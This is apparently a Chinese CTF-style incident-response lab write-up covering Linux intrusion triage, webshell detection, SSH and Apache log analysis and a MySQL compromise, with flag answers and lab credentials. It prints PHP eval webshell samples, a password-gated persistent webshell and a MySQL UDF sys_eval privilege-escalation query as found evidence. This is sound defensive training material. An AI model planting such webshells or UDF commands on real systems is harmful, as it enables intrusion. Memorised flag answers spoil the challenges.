第一章 应急响应- Linux入侵排查

  1. web目录存在木马,请找到木马的密码提交

    打包/var/www/html目录下的文件:

    tar -cvf archieve.tar .

    D盾扫描得到木马路径:\archive\www\html\1.php

    1
    <?php eval($_POST[1]);?>

    flag:flag{1}

  2. 服务器疑似存在不死马,请找到不死马的密码提交

    查看D盾结果中已知后门:\archive\www\html\index.php,每隔usleep(3000);生成一次.shell.php

    1
    <?php if(md5($_POST["pass"])=="5d41402abc4b2a76b9719d911017c592"){@eval($_POST[cmd]);}?>

    md5解密得flag:flag{hello}

  3. 不死马是通过哪个文件生成的,请提交文件名

    由 2问 得:flag{index.php}

  4. 黑客留下了木马文件,请找出黑客的服务器ip提交

    同路径下shell(1).elf 较为可疑,运行之后看网络连接netstat -antlp,得到外部连接中黑客的服务器ip:10.11.55.21

    1
    tcp        0      1 10.0.10.1:33688         10.11.55.21:3333        SYN_SENT    943/./shell(1).elf

    故flag:flag{10.11.55.21}

  5. 黑客留下了木马文件,请找出黑客服务器开启的监端口提交

    同 4问 得:flag{3333}

第一章 应急响应-webshell查杀

  1. 黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx}

    打包 /var/www 路径下全部文件

    1
    tar -cvf shell.tar -C /var/www .

    用D盾对解压后的文件进行扫描,

    在后门文件 /www/html/include/gz.php 得到 027ccd04-5065-48b6-a32d-77c704a5e26d

    故flag为:flag{027ccd04-5065-48b6-a32d-77c704a5e26d}

  2. 黑客使用的什么工具的shell github地址的md5 flag{md5}

    截取 gz.php 中间任意一段代码,在github对代码段搜索可知webshell为godzilla

    1
    2
    echo -n "https://github.com/BeichenDream/Godzilla" | md5sum 
    39392de3218c333f794befef07ac9257  -

    故flag为:flag{39392de3218c333f794befef07ac9257}

  3. 黑客隐藏shell的完整路径的md5 flag{md5} 注 : /xxx/xxx/xxx/xxx/xxx.xxx

    D盾扫描得到隐藏shell完整路径:/www/html/include/Db/.Mysqli.php

    1
    2
    echo -n "/var/www/html/include/Db/.Mysqli.php" | md5sum 
    aebac0e58cd6c5fad1695ee4d1ac1919  -

    故flag为:flag{aebac0e58cd6c5fad1695ee4d1ac1919}

  4. 黑客免杀马完整路径 md5 flag{md5}

    1
    2
    echo -n "/var/www/html/wap/top.php" | md5sum 
    eeff2eabfd9b7a6d26fc1a53d3f7d1de  -

    故flag为:flag{eeff2eabfd9b7a6d26fc1a53d3f7d1de}

第一章 应急响应-Linux日志分析

  1. 有多少IP在爆破主机ssh的root帐号,如果有多个使用","分割 小到大排序 例如flag{192.168.200.1,192.168.200.2}

    linux登录日志一般在 /var/log/auth.log

    1
    2
    cd /var/log
    cat auth.log.1 | grep -a "Failed password for root" | awk '{print $11}' | uniq | sort

    故flag为:flag{192.168.200.2,192.168.200.31,192.168.200.32}

  1. ssh爆破成功登陆的IP是多少,如果有多个使用","分割

    1
    cat auth.log.1 | grep -a "Accepted" | awk '{print $11}' | uniq

    故flag为:flag{192.168.200.2}

  2. 爆破用户名字典是什么?如果有多个使用","分割

    1
    cat auth.log.1 | grep -a "Failed password" |perl -e 'while($_=<>){ /for(.*?) from/; print "$1\n";}'|uniq -c|sort -nr

    故flag为:flag{user,hello,root,test3,test2,test1}

  3. 成功登录 root 用户的 ip 一共爆破了多少次

    1
    cat auth.log.1 | grep -a "Failed password for root" | awk '{print $11}' | sort -n | uniq -c

    故flag为:flag{4}

  4. 黑客登陆主机后新建了一个后门用户,用户名是多少

    在auth.log.1找到new user用户名:test2

    故flag为:flag{test2}

第二章 日志分析-apache日志分析

  1. 提交当天访问次数最多的IP,即黑客IP:

    Ubuntu 系统 apache 默认日志路径在 /var/log/apache2/

    1
    2
    3
    4
    5
    6
    7
    cat /var/log/apache2/access.log.1 | awk '{print $1}' | sort -rn | uniq -c | sort -r
       6555 192.168.200.2
         29 ::1
          5 192.168.200.38
          1 192.168.200.48
          1 192.168.200.211
          1

    故flag为:flag{192.168.200.2}

  2. 黑客使用的浏览器指纹是什么,提交指纹的md5:

    1
    cat /var/log/apache2/access.log.1 | grep "192.168.200.2"

    浏览器指纹为:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36

    1
    echo -n "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36" | md5sum

    故flag为:flag{2d6330f380f44ac20f3a02eed0958f66}

  3. 查看index.php页面被访问的次数,提交次数:

    1
    grep "/index.php" /var/log/apache2/access.log.1 | wc -l

    故flag为:flag{27}

  4. 查看黑客IP访问了多少次,提交次数:

    1
    2
    3
    4
    5
    6
    7
    cat /var/log/apache2/access.log.1 | awk '{print $1}' | sort -rn | uniq -c | sort -r
       6555 192.168.200.2
         29 ::1
          5 192.168.200.38
          1 192.168.200.48
          1 192.168.200.211
          1

    故flag为:flag{6555}

  5. 查看2023年8月03日8时这一个小时内有多少IP访问,提交次数:

    1
    2
    3
    4
    5
    6
    cat /var/log/apache2/access.log.1 | grep "03/Aug/2023:08" | awk '{print $1}' | sort -nr| uniq -c
          1 192.168.200.48
          5 192.168.200.38
          1 192.168.200.211
       6555 192.168.200.2
         29 ::1

    故flag为:flag{5}

第二章日志分析-mysql应急响应

1
2
3
4
5
6
mysql应急响应 ssh账号 root  密码 xjmysql
ssh env.xj.edisec.net  -p xxxxx
1.黑客第一次写入的shell flag{关键字符串} 
2.黑客反弹shell的ip flag{ip}
3.黑客提权文件的完整路径 md5 flag{md5} 注 /xxx/xxx/xxx/xxx/xxx.xx
4.黑客获取的权限 flag{whoami后的值}

  1. 黑客第一次写入的shell flag{关键字符串}

    打包目录/var/www/html,D盾扫描,后门文件\sh.php

    flag{ccfda79e-7aa1-4275-bc26-a6189eb9a20b}

  2. 黑客反弹shell的ip flag{ip}

    通过ps -aux查询到可疑用户

    1
    mysql        364  0.0  1.6 619980 64156 ?        Sl   04:51   0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin --user=mysql --log-error=/var/log/mysql/error.log --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock --port=3306

    该用户执行command的log日志被记录于/var/log/mysql/error.log,查看日志,发现有一个可疑的脚本1.sh

    执行find / -name 1.sh,得到反弹shell的ip

    flag{192.168.100.13}

  3. 黑客提权文件的完整路径 md5 flag{md5} 注 /xxx/xxx/xxx/xxx/xxx.xx

    在路径/usr/lib/mysql/plugin/发现udf提权文件

    flag{b1818bde4e310f3d23f1005185b973e7}

  4. 黑客获取的权限 flag{whoami后的值}

    在文件/var/www/html/common.php中得到mysql数据库账号密码

    登入数据库mysql -u root -p334cc35b3c704593

    1
    2
    SELECT * FROM mysql.func;
    select sys_eval('whoami');

    flag{mysql}